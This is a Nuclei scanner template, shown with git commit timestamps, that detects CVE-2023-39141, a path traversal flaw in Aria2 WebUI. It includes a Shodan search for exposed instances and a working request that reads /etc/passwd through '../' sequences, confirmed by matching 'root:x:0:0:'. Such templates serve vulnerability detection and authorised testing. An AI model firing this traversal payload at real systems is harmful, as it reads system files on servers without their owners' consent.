nuclei-templates/http/cves/2023/CVE-2023-39141.yaml

38 lines
999 B
YAML
Raw Normal View History

2023-08-23 07:00:27 +00:00
id: CVE-2023-39141
info:
name: Aria2 WebUI - Path traversal
author: DhiyaneshDk
severity: high
description: |
webui-aria2 commit 4fe2e was discovered to contain a path traversal vulnerability.
reference:
- https://twitter.com/win3zz/status/1694239332465520684
- https://gist.github.com/JafarAkhondali/528fe6c548b78f454911fb866b23f66e
- https://github.com/ziahamza/webui-aria2/blob/109903f0e2774cf948698cd95a01f77f33d7dd2c/node-server.js#L10
metadata:
shodan-dork: title:"Aria2 WebUI"
verified: true
max-request: 1
tags: lfi,unauth,aria2,webui
http:
- method: GET
path:
2023-08-24 03:53:50 +00:00
- "{{BaseURL}}"
2023-08-23 07:00:27 +00:00
- "{{BaseURL}}/../../../../etc/passwd"
2023-08-23 07:02:23 +00:00
matchers-condition: and
2023-08-23 07:00:27 +00:00
matchers:
2023-08-24 03:53:50 +00:00
- type: dsl
dsl:
- 'contains(body_1, "Aria2 WebUI")'
- 'status_code_2 == 200'
- 'contains(content_type_2, "text/html")'
condition: and
2023-08-23 07:00:27 +00:00
- type: regex
2023-08-24 03:53:50 +00:00
part: body_2
2023-08-23 07:00:27 +00:00
regex:
- "root:x:0:0:"